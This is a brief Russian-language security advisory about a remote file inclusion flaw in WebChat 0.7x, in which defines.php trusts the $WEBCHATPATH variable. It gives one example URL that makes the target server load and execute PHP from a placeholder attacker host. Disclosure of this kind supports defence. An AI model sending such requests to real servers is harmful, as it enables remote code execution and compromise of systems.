Дата публикации: | 05.03.2003 |
Всего просмотров: | 1351 |
Опасность: | Высокая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | WebChat 0.7x |
Описание: | Уязвимость включения файла обнаружена в WebChat. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевом сервере. Сценарий 'defines.php' включает файлы 'db_mysql.php' и 'language/eng lish.php' через переменную $WEBCHATPATH, но не проверяет правильность местоположения файла перед его включением. Удаленный пользователь может определить удаленное местоположение этих файлов, заставляя целевой сервер включить и выполнить дистанционно расположенные файлы. Пример: http://[target]/defines.php?WEBCHATPATH=http://[attacker]/ где http://[attacker]/language/english.php или http://[attacker]/language/db_mysql.phpУязвимость обнаружена в WebChat 0.77 |
Ссылки: | WebChat |